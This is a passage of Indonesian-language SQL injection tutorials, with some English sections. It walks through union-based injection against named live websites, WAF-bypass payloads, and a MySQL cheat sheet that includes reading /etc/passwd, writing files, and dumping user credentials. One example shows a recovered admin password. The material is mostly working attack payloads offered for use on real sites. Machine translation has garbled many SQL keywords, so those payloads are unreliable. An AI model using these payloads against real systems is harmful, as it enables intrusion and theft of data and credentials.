1899rdb$field_name - obvious from the name
1900rdb$system_flag - the same
1901rdb$field_position - the serial number field
1902rdb$relation_name, rdb $ base_field - define table names
1903
1904©
1905-h
1906
1907Langkah-1: Memulai dengan Berbasis Union:
1908
1909Setiap db menggunakan prinsip yang sama untuk menarik data keluar dari db ofcourse itu pilih menggunakan nama kolom yang tepat.
1910
1911Saya tidak akan menjelaskan tentang pilih sebab yang saya tahu tentang itu.
1912
1913
1914Langkah-2: Memeriksa Target Untuk Vunl.
1915
1916Kode:
1917http://www.crookedtree.org/index.php?catid=583 '
1918
1919kesalahan telah terjadi dengan database! SELECT *
1920DARI bus_kategori
1921MANA id = 583 \ '
1922
1923Kesalahan MYSQL dengan MYSQL atau MS SQL dengan SQL atau ORACLE dengan ORA atau MS ACCESS dengan Jet dan
1924Peringatan: pg_exec () [function.pg-exec] <== PostgreSQL ATAU kesalahan seperti di atas.
1925
1926
1927Langkah-3: Mendapatkan Jumlah Kolom
1928
1929Untuk Mendapatkan kolom, kami menggunakan metode yang sama yang digunakan dalam urutan db lain dengan kami menggunakan - atau # untuk komentar.
1930
1931Kode:
1932http://www.crookedtree.org/index.php?catid=583 pesanan dengan 1-- <== tidak ada kesalahan
1933http://www.crookedtree.org/index.php?catid=583 pesanan oleh 2-- <== tidak ada kesalahan
1934http://www.crookedtree.org/index.php?catid=583 pesanan sebesar 3-- <== tidak ada kesalahan
1935http://www.crookedtree.org/index.php?catid=583 pesanan sebesar 4-- <== tidak ada kesalahan
1936
1937Kami akan melakukan increament of 1 hingga mendapatkan kesalahan dan kami memiliki kesalahan pada kolom ke-14.
1938
1939Itu berarti kita memiliki 13 kolom (error_column_num - 1) = 13.
1940
1941Metode lain mengeksekusi query dengan union dan masuk ke kolom I.E
1942
1943Kode:
1944http://www.crookedtree.org/index.php?catid=-583 union pilih null-- <== kesalahan
1945http://www.crookedtree.org/index.php?catid=-583 union pilih null, null-- <== kesalahan
1946http://www.crookedtree.org/index.php?catid=-583 union pilih null, null, null-- <== kesalahan
1947
1948Kami akan terus menambahkan nol hingga kami mendapatkan halaman kosong atau situs yang dimuat. Metode ini benar-benar anoying Big Grin.
1949
1950
1951Langkah-4: Mendapatkan Data untuk Kolom Visble.
1952
1953Istilah sebagian besar penggunaan ppl adalah kolom vuln. Sama seperti injeksi Oracle, kita akan menggunakan tipe data Null untuk kolom.
1954
1955Pertanyaannya adalah mengapa ????? Karena kita tidak tahu tentang datatype sehingga menggunakan datatype null akan melakukan trik untuk kita.
1956dan tentu saja beberapa situs memang memiliki nilai interger sehingga akan digunakan sebagai sebaliknya.
1957
1958Kode:
1959http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, null, null, null, null, null,
1960null, null, null, null, null--
1961
1962Sekarang dapat melihat halaman dimuat dengan kesalahan keluar (beberapa waktu dimuat tetapi konten yang hilang seperti di situs ini).
1963
1964Sekarang apa tapi tidak bisa melihat cetak coulmn di layar. Mari kita lanjutkan dengan nilai interger tetapi 0.
1965
1966Kode:
1967http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0, null, null, null, null, null, null, null,
1968null, null, null, null, null-- <== tidak ada kesalahan
1969http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0, null, null, null, null, null, null,
1970null, null, null, null, null-- <== tidak ada kesalahan
1971http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,0, null, null, null, null, null,
1972null, null, null, null, null-- <== kesalahan
1973http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0, null, 0, null, null, null, null,
1974null, null, null, null, null-- <== kesalahan
1975
1976Akan terus mengganti nol dengan nilai interget "0" sampai mendapat kesalahan. Wow kami memiliki kesalahan pada kolom ke-3 dan ke-4, ada kolom lain yang juga tetapi kami berhenti di sini dan pindah ke langkah berikutnya.
1977
1978Ini yang kami cari.
1979
1980
1981Langkah-5: Mendapatkan Versi DB
1982
1983Sekarang permintaan kami akan sama dengan nol kecuali kolom keempat, akan menggantikannya dengan versi.
1984
1985Kode:
1986http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null, null, null, version (), null, null, null, null,
1987null, null, null, null, null--
1988
1989PostgreSQL 8.2.9 pada x86_64-pc-linux-gnu, yang dikompilasi oleh GCC cc (GCC) 4.1.2 (Ubuntu 4.1.2-0ubuntu4)
1990
1991Sekarang sudah mendapat versi db Big Grin.
1992
1993
1994Langkah-6: Mendapatkan DBz dan Tabel Skema lainnya
1995
1996Saya akan memeriksa apakah target ini memiliki db lain atau tidak
1997
1998Kode:
1999http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, datname, null, null, null, null,
2000null, null, null, null, null DARI pg_database--
2001
2002AAA <== db
2003
2004kita hanya melihat satu database pada satu waktu, Sekarang apa yang harus dilakukan hmmm bagaimana menggunakan batas untuk mendapatkan orang lain Big Grin.
2005
2006Kode:
2007http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, datname, null, null, null,
2008null, null, null, null, null, null DARI pg_database LIMIT 1 OFFSET 1--
2009
2010LIMIT 1 OFFSET 1 <== nilai OFFSET. Jika kita terus mengubah nilai ini maka kita akan mendapatkan db Big Grin berikutnya seperti 1 2 3 .....
2011
2012Saya akan menjelaskan cara menggunakan db lain untuk injeksi di tutz lain. Sekarang kita akan pindah ke injeksi kami.
2013
2014Langkah-6.1: Sekarang Memperoleh Tabel Skema.
2015
2016Kode:
2017http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null,
2018table_name, null, null, null, null, null, null, null, null, null DARI INFORMATION_SCHEMA.TABLES--
2019
2020buku tambahan
2021
2022Bad thing is cant concat hehehe aah jadi apa yang harus dilakukan sekarang. Kami harus menggunakan batas. Saya sudah jelaskan
2023bagaimana cara menggunakannya .
2024
2025Kode:
2026http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null,
2027table_name, null, null, null, null, null, null, null, null, null DARI INFORMATION_SCHEMA.TABLES batas 1 offset 3--
2028
2029artist_entry
2030
2031ATAU Tabel Dari Skema DB Saat Ini
2032
2033Kode:
2034http://www.crookedtree.org/index.php?catid=-583 UNION PILIH null, null, null, table_name, null, null,
2035null, null, null, null, null, null, null DARI INFORMATION_SCHEMA.TABLES dimana table_schema = current_schema ()
2036limit 1 offset 0--
2037
2038buku tambahan
2039
2040Hanya
2041
2042MS-ACCESS INJECTION TUTORIAL
2043
2044Jadi kita akan memulai Penyuntikan Kita Secara Manual. Pertama kita harus memeriksa apakah situs Target kami Rentan. Jadi kita akan menggunakan Jenis Penginjeksian biasa dan menambahkan Single Quote 'di bagian akhir Parameter.
2045
2046dan Jalankan URL
2047
2048http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 '
2049Di sini kami mendapat ERROR! !
2050
2051KESALAHAN:
2052Kesalahan Microsoft JET Database Engine '80040e14'
2053Kesalahan sintaks dalam string dalam ekspresi query 'ID = 341' '.
2054/dettaglio-news.asp, baris 91
2055Jadi Target Kami Rentan. Sebelum Memulai Proses Lain terlebih dahulu, kami harus menyeimbangkan permintaan kami. Kami akan menggunakan Berbagai Komentar untuk menyeimbangkan Permintaan Kami.
2056
2057http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Kesalahan!
2058
2059KESALAHAN: Kesalahan sintaks (operator tidak ada) dalam ekspresi kueri 'ID = 341--'.
2060
2061http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Lagi Kesalahan !!
2062
2063Sekarang, mari kita periksa null-byte ";% 00"
2064http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;% 00 Kesalahan Hilang !!
2065jadi akan melanjutkan Injecting Kami Dengan menggunakan Null-Byte di bagian akhir Parameter.
2066
2067Sekarang kita harus menghitung Jumlah Kolom. Jadi Untuk Tujuan Ini kita akan menggunakan perintah ORDER BY Biasanya.
2068Mari Periksa Jumlah Kolom:
2069http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 1;% 00
2070Tidak Ada Kesalahan. Halaman Dimuat Secara Normal!
2071
2072http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 5;% 00
2073Sekali lagi Tidak Ada Kesalahan!
2074
2075http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 8;% 00
2076Lagi halaman Loaded Biasanya!
2077
2078tetapi pada pesanan jam 9 kami sudah mendapat ERROR!
2079http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 pesanan sebesar 9;% 00
2080
2081KESALAHAN:
2082Kesalahan Microsoft JET Database Engine '80040e14'
2083Mesin database Microsoft Jet tidak mengenali '9' sebagai nama atau ekspresi lapangan yang valid.
2084/dettaglio-news.asp, baris 91
2085Jadi Ada 8 Kolom.
2086Sekarang Mari Siapkan perintah UNION BASED kami.
2087Setelah Melaksanakan Permintaan BERDASARKAN UNION Kami Punya KESALAHAN:
2088http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;% 00
2089
2090KESALAHAN:
2091Kesalahan Microsoft JET Database Engine '80004005'
2092Input kueri harus berisi setidaknya satu tabel atau kueri.
2093/dettaglio-news.asp, baris 91
2094Di sini Comes The Main part.As jumlah kolom kami benar.jadi sepertinya Database adalah mysql 4.
2095Sekarang Kita Harus Menebak Tabel dan Kolom. Jadi Pertama-tama kita akan Tebak Tables.
2096
2097http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Pilih 1,2,3,4,5,6,7,8 dari Login;% 00
2098itu memberi kita ERROR!
2099
2100KESALAHAN:
2101Kesalahan Microsoft JET Database Engine '80040e37'
2102Mesin database Microsoft Jet tidak dapat menemukan tabel input atau query 'login'. Pastikan itu ada dan namanya dieja dengan benar.
2103/dettaglio-news.asp, baris 91
2104itu artinya tabel ini tidak ada. Mari coba yang lain.
2105http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Pilih 1,2,3,4,5,6,7,8 dari tabladmin;% 00
2106Masih Sama ERROR !!
2107Namun ketika kami mencoba Tabel ADMIN, Kesalahannya Sudah Hilang.
2108http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Pilih 1,2,3,4,5,6,7,8 dari admin;% 00
2109Pada Tabel ADMIN, Kesalahan hilang dan kita dapat melihat Kolom yang Rentan di Halaman Web.
2110
2111Anda dapat melihat 2,3,6 adalah Kolom yang Rentan. Jadi sekarang kita harus Tebak Kolom. Kita akan menempatkan kolom-kolom kita di Kolom-kolom yang Rentan.
2112http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2, admin_id, 4,5,6,7,8 dari admin;% 00
2113Itu Memberi Kita Kesalahan!
2114
2115itu Memberi kami Password = "bEx0Th6
2116Jadi kami akan melakukan hal yang sama untuk situs lain untuk disuntikkan ke dalam basis data.
2117
2118MENGENAI SEMUA INJEKTOR: *
2119
2120
2121Menambahkan Tag HTML di Pertanyaan SQL - Tutorial oleh RAi Jee
2122Tag HTML dapat digunakan untuk banyak kesenangan dalam kueri SQL. Kita Dapat menggunakan Tag HTML untuk Membuat Hasil Penuh Warna di Output. Kadang-kadang kita menyuntikkan Situs dan Kolom yang Rentan ada di Judul atau di Halaman Sumber sehingga kita Juga Dapat Menggunakan Tag HTML Ada untuk Menunjukkan Output pada Halaman.
2123Jadi Kami Akan Mulai Menambahkan Tag HTML Untuk Membuat Output Beberapa Warna Penuh.
2124Berikut ini contohnya. Kami ingin Mencetak Versi dalam Warna MERAH Jadi Berikut adalah TAG HTML kami untuk Menampilkan Versi dalam Warna MERAH.
2125<font color = red>
2126
2127Concat (OUR_HTML_TAG, QUERY_HERE)
2128
2129mari Lihat Hasil. Sebelum Melaksanakan Query First Encode HTML TAG di Hex Value atau Use Single Quote Sebelum dan Sesudah Tag HTML Agar Dapat Dieksekusi
2130
2131http://www.kimclement.com/basiccal/event.php
2132? id = -444 'UNION SELECT 1,2,3,4,5,6, Concat (' <font color = red> ', versi ()), 8,9 - +
2133
2134Dan Anda dapat Lihat Versi dalam warna MERAH. jika kita ingin menggunakan Warna yang Berbeda untuk Setiap Perintah Seperti Menampilkan Versi dalam Warna MERAH, Basis Data dalam Warna Hijau, Pengguna dalam Warna Biru sehingga akan menggunakan Tag HTML yang berbeda untuk setiap Tugas.
2135Lihat Contoh.
2136Concat (Versi Warna MERAH, Basis Data dalam Warna Hijau, Pengguna dengan Warna Biru)
2137Tag HTML Untuk Setiap Tugas:
2138Warna merah: <font color = red>
2139Warna Hijau: <font color = green>
2140Warna Biru: <font color = blue>
2141Jadi Pertanyaan Terakhir Kami Untuk Menampilkan Setiap tugas dalam warna yang berbeda Akan menjadi,
2142Concat (<font color = red>, versi (), <font color = green>, database (), <font color = blue>, pengguna ())
2143Lihat Contoh.
2144http://www.kimclement.com/basiccal/event.php
2145? id = -444 'UNION SELECT 1,2,3,4,5,6, Concat (' <font color = red> ', versi (), 0x3a,' <font color = green> ', database (), 0x3a, '<font color = blue>', pengguna ()), 8,9 - +
2146
2147Dan Lihat gambar semua Tugas Lengkap. Dengan cara ini Anda Juga Dapat Menampilkan Tabel dan Kolom dalam Warna yang berbeda.
2148Setelah Menampilkan Perintah SQLi dalam Berbagai Warna.
2149Sekarang, mari kita lihat bagaimana kita bisa menampilkan data ketika kolom rentan kita di halaman sumber atau di TiTLE menggunakan HTML TAGS.
2150Ketika Kolom Rentan ada di Halaman Sumber.
2151Concat (STARTING_HTML_TAG, OUR_QUERY, ENDING_HTML_TAG)
2152jadi kami akan menggunakan TAG HTML ini untuk Menampilkan Data pada Halaman jika Kolom Rawan Kami ada di halaman Sumber.
2153
2154TAG HTML: Concat (<font size = "8" color = "red">, Versi (), </ font>)
2155
2156dan kadang-kadang Kolom Rentan kami ada di Judul sehingga dalam hal ini kami akan menggunakan Tag HTML ini untuk Mencetak Data di Halaman Web
2157
2158TAG HTML: Concat (</ title>, Version ())
2159
2160gunakan Tag HTML ini setelah pengkodean dalam Hex Value atau PUT Single Quote sebelum dan sesudah Tag HTML untuk membuat Query Executable.
2161
2162©
2163
2164When you try to access server with your SQL WAF will stop you again. You might have more luck if WAF controls only GET requests and you inject with POST.
2165
2166SQLi Waf Behaviours
2167
2168union select 1,2,3,4-- - [<---WAF
2169
2170/*!union*/ select 1,2,3,4-- - [<--- No WAF
2171
2172/*!union*/ select 1,group_concat(),3,4-- - [<--NO -WAF
2173
2174/*!union*/ select 1,group_concat(table_name),3,4-- - [<---WAF
2175
2176/*!union*/ select 1,group_concat(/*!table_name*/),3,4-- - [<--- No WAF
2177
2178/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from -- - [<---No WAF
2179
2180/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables-- - [<---No WAF
2181
2182/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables where-- - [<---WAF
2183
2184/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/-- - [<---No WAF
2185
2186/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema-- - [<---No WAF
2187
2188/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema=database()-- - [<---No WAF
2189
2190-h
2191
2192Tools of Online Crytography
2193
2194HEADER AND POST DATA SQLI AND LOOKING DEEP INTO VULNERABLE SUCH AS XSS
2195https://www.hurl.it/
2196http://requestmaker.com/
2197http://headers.cloxy.net/
2198http://www.rexswain.com/
2199
2200http://www.cryptool-online.org/index.php?option=com_cto&view=tool&Itemid=139&lang=en
2201Base 64
2202enigmaco
2203http://www.swingnote.com/tools/texttohex.php
2204http://des.online-domain-tools.com/
2205
2206http://www.verexif.com/en/
2207http://www.extractmetadata.com/
2208http://metapicz.com/#landing
2209
2210https://www.google.co.kr/search?biw=1280&bih=617&q=cryptography+converter+online&oq=Cryptography+convert&gs_l=serp.1.1.0j0i22i30.2581.5076.0.7002.13.13.0.0.0.0.143.1345.5j8.13.0....0...1c.1.64.serp..0.13.1344.BK2uvc9iKTo
2211
2212Gematria Primus count: http://codeseekah.com/cicada/count.html
2213http://www.unit-conversion.info/texttools/hexadecimal/
2214XOR: http://md5decrypt.net/en/Xor/
2215http://www.braingle.com/brainteasers/codes/index.php
2216ASCII HEX DEC BIN converter: http://home.paulschou.net/tools/xlate/
2217
2218ASCI HEX DEC OCTAL converter: http://redir.dasumo.com/hex/
2219
2220Steganography software: http://www.jjtc.com/Steganography/tools.html
2221https://www.base64-image.de/
2222http://b64.io/
2223https://xcode.darkbyte.ru/
2224http://manytools.org/hacker-tools/steganography-encode-text-into-image/
2225http://decodebase64.com/
2226https://convertio.co/txt-jpg/
2227Anagram solver: http://www.ssynth.co.uk/~gay/anagram.html
2228
2229Rumkin old ciphers: http://rumkin.com/tools/cipher/index.php
2230PGP https://www.igolder.com/pgp/encryption/
2231http://www.hanewin.net/encrypt/PGdecode.htm
2232Exif:
2233http://www.garykessler.net/library/fsc_stego.html
2234AES, Salsa20, and Twofish
2235http://www.gematrix.org/
2236https://infotomb.com/m/welcome
2237http://morsecode.scphillips.com/translator.html
2238http://www.online-toolz.com/tools/text-encryption-decryption.php
2239http://www.unit-conversion.info/texttools/morse-code/
2240https://futureboy.us/stegano/
2241
2242-h
2243
2244BYPASSING ERROR
2245
2246Hmmm kita akan mulai dengan Injecting normal kami. Kami menemukan situs dari Google saat menyuntik dan rentan terhadap injeksi SQL.
2247Pertama kita akan menghitung jumlah total kolom.
2248
2249http://www.TARGET.com/product.php?id=35 pesanan sebesar 5-- -
2250
2251Tidak Ada Kesalahan!
2252
2253http://www.TARGET.com/product.php?id=35 pesanan sebesar 6-- -
2254
2255Sekali lagi Situs dimuat Biasanya dan Tidak Ada Kesalahan!
2256
2257http://www.TARGET.com/product.php?id=35 pesanan sebesar 7-- -
2258
2259Sekarang Kita Punya Kesalahan di sini
2260
2261Kolom tidak dikenal '7' di 'pesanan klausa'
2262
2263Berarti Ada Total 6 Jumlah Kolom.
2264
2265Memungkinkan Jalankan UNION BASED Query kami.
2266
2267http://www.TARGET.com/product.php?id=35 dan 0 Union SELECT 1,2,3,4,5,6-- -
2268
2269Setelah mengeksekusi UNION BASED Query, kami Punya Kesalahan.
2270
2271Kesalahan fatal: Ukuran memori yang diizinkan sebesar 536870912 byte habis (mencoba mengalokasikan 534511572 byte) di /home/XXXX/public_html/cat_ver_producto.php pada baris 166
2272
2273Masalahnya adalah dengan Memori PHP Server. Kami Akan menggunakan Nilai NULL daripada menempatkan Kolom Nomor di sana untuk Memotong Server Penggunaan Memori PHP untuk Query SQL kami.
2274
2275Setelah Menempatkan nilai NULL, Kueri Kita Akan Jadi.
2276http://www.TARGET.com/product.php?id=35 dan 0 Union SELECT null, null, null, null, null, null-- -
2277
2278Sekarang ERROR GONE !!
2279
2280Karena kami menggunakan Null Values, kami tidak tahu Kolom mana yang Rentan. Jadi untuk menemukan Kolom yang Rentan, Kita Berikan Perintah Versi () satu per satu di setiap Kolom sampai Memberi Kita Hasil Apapun.
2281
2282http://www.TARGET.com/product.php?id=35 dan 0 versi PILIH Union (), null, null, null, null, null-- -
2283
2284Setelah mengecek Kolom pertama selanjutnya Periksa Yang Lain dan kemudian Lain lagi sampai kami Mendapat Hasilnya. Dengan Cara Ini kami Akan Memeriksa Semua Kolom dan Akan Menemukan Kolom Yang Rentan.
2285
2286Ketika kami akan menemukan Kolom yang Rentan kami, maka kami dapat menempatkan Permintaan kami untuk Tabel dan Kolom di Kolom yang rentan itu.
2287jika Anda Tidak Tahu Bagaimana Mendapatkan Tabel Dan Kolom Kemudian.
2288
2289-h
2290
2291
2292Memotong Mix of Collations yang ilegal - Tutorial
2293Dengan suntik pikiran
2294Hanya 4 no0b seperti saya
2295Dalam Tutorial ini Anda Akan Mempelajari Cara Melepaskan Campuran Kolasi ilegal.
2296Mari kita mulai dengan injeksi SQL Reguler kami.
2297Target kami.
2298http://www.Site.com/detail.php?id=31
2299Pertama kita harus Hitung Berapa Banyak Kolom yang dimilikinya.
2300http://www.Site.com/detail.php?id=31 pesanan oleh 1-- -
2301Tidak Ada Kesalahan!
2302http://www.Site.com/detail.php?id=31 pesanan oleh 4-- -
2303Tidak Ada Kesalahan!
2304http://www.Site.com/detail.php?id=31 pesanan sebesar 6-- -
2305Kami Punya Kesalahan Di Sini.
2306Kolom Tidak Diketahui '6' di 'pesanan oleh'
2307Memungkinkan Mengurangi Jumlah Kolom.
2308http://www.Site.com/detail.php?id=31 pesanan sebesar 5-- -
2309Tidak Ada Kesalahan!
2310Ada 5 Kolom jadi ayo Siapkan UNION SELECT Command dan Cari Kolom yang Rentan.
2311http://www.Site.com/detail.php?id=31 dan 0 Union Select 1,2,3,4,5-- -
2312Kami Punya 2 dan 3.
2313Mari mencoba untuk Dapatkan The Tables.
2314http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, concat (table_name), 3,4,5 dari information_schema.tables di mana table_schema = database () - -
2315Ooops !! kami mendapat Kesalahan Di Sini.
2316Campuran ilegal dari kolasi untuk operasi 'UNION'
2317Berikut Beberapa Metode yang dapat kita gunakan untuk Melewatkan campuran ilegal dari pengumpulan untuk operasi 'UNION'
2318.1 Menggunakan UNCOMPRESS (COMPRESS (our_query_here))
2319http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, uncompress (kompres (concat (table_name))), 3,4,5 dari information_schema.tables di mana table_schema = database () - - -
2320DIKECEPATAN !!
2321.2 Menggunakan UNHEX (HEX (our_query_here))
2322http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, unhex (hex (concat (table_name))), 3,4,5 dari information_schema.tables di mana table_schema = database () - - -
2323DIKECEPATAN !!
2324.3 Menggunakan CAST ()
2325http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, cast (table_name sebagai binary), 3,4,5 dari information_schema.tables di mana table_schema = database () - -
2326DIKECEPATAN !!
2327.4 Menggunakan CONVERT ()
2328http://www.Site.com/detail.php?id=31 dan 0 Union Select 1, konversikan (table_name menggunakan ascii), 3,4,5 dari information_schema.tables di mana table_schema = database () - -
2329DIKECEPATAN !!
2330BEBERAPA METODE ADVANCE untuk CONVERT ()
2331Dalam CONVERT () Fungsi jika ascii tidak berfungsi maka kita dapat menggunakan Fungsi ini sebagai ganti ascii.
2332ujis
2333ucs2
2334tis620
2335swe7
2336sjis
2337macroman
2338macce
2339latin7
2340latin5
2341latin2
2342koi8u
2343koi8r
2344keybcs2
2345hp8
2346geostd8
2347gbk
2348gb2132
2349armscii8
2350ascii
2351cp1250
2352big5
2353cp1251
2354cp1256
2355cp1257
2356cp850
2357cp852
2358cp866
2359cp932
2360dec8
2361euckr
2362latin1
2363Semoga ini akan membantu Anda di masa depan
2364
2365Terima kasih untuk saudara tutorialnya: *
2366
2367-h
2368
2369
2370filtered Requested
2371# tables #
2372group_concat(/*!table_name*/)
2373+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
2374
2375or
2376
2377/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
2378
2379or
2380
2381/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
2382
2383Union Select bypass
2384
2385&id=10 %26%26 NULL union/**/DistinctRow select 1,2-- -
2386&id=@ Or 1<0 union/**/DistinctRow select 1,2-- -
2387&id=@<0union/**/DistinctRow select 1,2-- -
2388
2389QUERY RESUME ? :D
2390Version:
2391SELECT VERSION()
2392SELECT @@version
2393SELECT @@version_comment
2394SELECT @@version_compile_machine
2395SELECT @@version_compile_os
2396Directories:
2397SELECT @@basedir
2398SELECT @@tmpdir
2399SELECT @@datadir
2400Users:
2401SELECT USER()
2402SELECT SYSTEM_USER()
2403SELECT SESSION_USER()
2404SELECT CURRENT_USER()
2405Current Database:
2406SELECT DATABASE()
2407Concatenation:
2408SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
2409SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Retu
2410Multi-Concat:
2411#Stacks the row "foo" from the table "bar" together, using the separa
2412#Note: This operation can by default only grab 1024 bytes, and do no
2413#The 1024 byte limit is stored in the @@group_concat_max_len variabl
2414SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar
2415Better-Concat:
2416#CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROU
2417#Which therefor allows you to concat strings together up to the @@ma
2418#instead of @@group_concat_max_len. The default value for @@max_allo
2419#1048576 bytes, instead of @@group_concat_max_len's 1024.
2420SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name
2421Change Collation:
2422SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from
2423SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.
2424Wildcards in SELECT(s):
2425SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) st
2426SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) en
2427Regular Expression in SELECT(s):
2428#Returns all columns matching the regular expression.
2429SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'
2430SELECT Without Dublicates:
2431SELECT DISTINCT foo FROM bar
2432Counting Columns:
2433SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from t
2434Get Amount of MySQL Users:
2435SELECT COUNT(user) FROM mysql.user
2436Get MySQL Users:
2437SELECT user FROM mysql.user
2438Get MySQL User Privileges:
2439SELECT grantee,privilege_type,is_grantable FROM information_schema.us
2440Get MySQL User Privileges on Different Databases:
2441SELECT grantee,table_schema,privilege_type FROM information_schema.sc
2442Get MySQL User Privileges on Different Columns:
2443SELECT table_schema,table_name,column_name,privilege_type FROM infor
2444Get MySQL User Credentials & Privileges:
2445SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Upd
2446Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,
2447File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_p
2448Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_
2449Repl_client_priv) FROM mysql.user
2450Get MySQL DBA Accounts:
2451SELECT grantee,privilege_type,is_grantable FROM information_schema.us
2452SELECT host,user FROM mysql.user WHERE Super_priv='Y'
2453Get Databases:
2454SELECT schema_name FROM information_schema.schemata
2455SELECT DISTINCT db FROM mysql.db
2456SELECT DISTINCT table_schema FROM information_schema.columns
2457SELECT DISTINCT table_schema FROM information_schema.tables
2458Get Databases & Tables:
2459SELECT table_schema,table_name FROM information_schema.tables
2460SELECT DISTINCT table_schema,table_name FROM information_schema.colu
2461Get Databases, Tables & Columns:
2462SELECT table_schema,table_name,column_name FROM information_schema.c
2463SELECT A Certain Row:
2464SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
2465SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
2466...
2467SELECT foo FROM bar LIMIT N,1; #Returns row N.
2468Benchmark (Heavy Query):
2469#Performs an MD5 calculation of "1" for 10000 times.
2470SELECT BENCHMARK(10000,MD5(1))
2471Sleep:
2472#Works only in MySQL 5 and above.
2473#Sleeps for 5 seconds, returns 0 on success.
2474SELECT SLEEP(5)
2475Conversion (Casting):
2476SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1
2477SELECT CAST('65' AS CHAR); #Returns: A
2478Substring:
2479SELECT SUBSTR('foobar',1,3); #Returns: foo
2480Hexadecimal Evasion:
2481SELECT 0x41424344; #Returns: ABCD
2482SELECT 0x2E; #Returns: .
2483SELECT 0x3A; #Returns: :
2484ASCII to Number:
2485SELECT ASCII('A'); #Returns: 65
2486Number to ASCII:
2487SELECT CHAR(65); #Returns: A
2488SELECT CHAR(89); #Returns: Y
2489SELECT CHAR(116,101,115,116); #Returns: test
2490If Statement:
2491#Returns 1 if the database is running MySQL 5.
2492SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);
2493#Returns 1 if the database is running MySQL 4.
2494SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);
2495Case Statement:
2496#Returns 1 if the database is running MySQL 5.
2497SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END
2498#Returns 1 if the database is running MySQL 4.
2499SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END
2500Read File(s):
2501#Requires you to have the File_priv in mysql.user. On error this stat
2502SELECT LOAD_FILE('/etc/passwd')
2503Write File(s):
2504#You must use quotes on the filename!
2505SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
2506SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hel
2507Logical Operator(s):
2508AND, &&; #The AND operator have && as an alternative syntax.
2509OR, ||; #The OR operator have || as an alternative syntax.
2510NOT, !; #The NOT operator have ! as an alternative syntax.
2511XOR; #The XOR operator got no alternative syntax.
2512Fuzzy Code Comment:
2513#Code within /*! are getting executed by MySQL. Additional /*! can be
2514SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/
2515Comments:
2516SELECT foo, bar FROM foo.bar-- Single line comment
2517SELECT foo, bar FROM foo.bar/* Multi line comment */
2518SELECT foo, bar FROM foo.bar# Single line comment
2519SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-
2520A few evasions/methods to use between your MySQL statements:
2521CR (%0D); #Carrier Return.
2522LF (%0A); #Line Feed.
2523Tab (%09); #The Tab-key.
2524Space (%20); #Most commonly used. You know what a space is.
2525Multiline Comment (/**/); #Well, as the name says.
2526Fuzzy Comment (/*!); #Be sure to end your query with (*/)
2527Parenthesis, ( and ); #Can also be used as separators when used right
2528Parenthesis instead of space:
